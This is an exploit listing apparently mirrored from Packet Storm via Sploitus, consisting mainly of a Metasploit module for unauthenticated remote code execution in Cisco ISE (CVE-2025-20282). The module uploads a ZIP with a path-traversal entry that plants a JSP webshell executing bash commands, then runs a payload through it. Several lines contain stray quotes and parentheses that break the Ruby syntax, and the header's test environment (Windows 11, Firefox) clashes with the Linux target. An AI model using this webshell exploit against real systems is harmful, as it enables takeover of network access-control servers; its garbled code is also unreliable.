Share
## https://sploitus.com/exploit?id=PACKETSTORM:220737
==================================================================================================================================
    | # Title     : Cisco ISE 2.2 Unauthenticated RCE Metasploit Module                                                              |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.cisco.com/                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : an RCE vulnerability in Cisco Identity Services Engine (ISE), identified as CVE-2025-20282. The flaw is related to insecure file upload handling combined with ZIP path traversal.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      prepend Msf::Exploit::Remote::AutoCheck
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::FileDropper
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name'           => 'Cisco ISE Unauthenticated RCE (CVE-2025-20282)',
            'Description'    => %q{
              This mod exploits an unauthorized file upload vulnerability in Cisco ISE.
    A ZIP file containing a JSP file with a manipulated path (Path Traversal) is uploaded.
    The webshell is then extracted to the Webapps folder.
            },
            'Author'         => [ 'indoushka' ],
            'License'        => MSF_LICENSE,
            'References'     => [ ['CVE', '2025-20282'] ],
            'Platform'       => 'linux',
            'Arch'           => ARCH_CMD,
            'Targets'        => [ ['Cisco ISE', {}] ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => '2025-01-01',
            'Notes'          => {
              'Stability'   => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options(
          [
            Opt::RPORT(443),
            OptBool.new('SSL', [true, 'Use SSL', true]),
            OptString.new('TARGETURI', [true, 'The base path', '/'])
          ]
        )
      end
    
      def check
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z')
        })
    
        return CheckCode::Unknown unless res
        return CheckCode::Appears if res.code == 405
    
        CheckCode::Safe
      end
    
      def exploit
        shell_name = "#{Rex::Text.rand_text_alpha(8)}.jsp"
        traversal_path = "appsrv/apache-tomcat/webapps/admin/error/#{shell_name}"
    
    print_status("Creating a ZIP file with path manipulation...")
    
        zip_data = Rex::Zip::Archive.new
        zip_data.add_file(traversal_path, jsp_payload)
    
       print_status("Uploading Webshell: #{shell_name}")")
    
        post_data = Rex::MIME::Message.new
        post_data.add_part(
          zip_data.pack,
          'application/zip',
          'binary',
          "form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.zip\""
        )
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z'),
          'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
          'data'   => post_data.to_s
        })
    
        unless res && res.code == 200
    fail_with(Failure::UnexpectedReply, "Upload failed (Response code: #{res&.code})")")
        end
    
        register_files_for_cleanup("appsrv/apache-tomcat/webapps/admin/error/#{shell_name}")
    
    print_status("Command being executed via Webshell...")
    
        cmd = Rex::Text.uri_encode(payload.encoded)
        execute_command(shell_name, cmd)
      end
    
      def execute_command(shell_name, cmd)
        send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'admin', 'error', shell_name),
          'vars_get' => { 'cmd' => cmd }
        }, 5)
      end
    
      def jsp_payload
        <<~JSP
          <%@ page import="java.io.*" %>
          <%
          String cmd = request.getParameter("cmd");
          if (cmd != null) {
              Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd});
              InputStream in = p.getInputStream();
              int c;
              while ((c = in.read()) != -1) out.print((char)c);
          }
          %>
        JSP
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================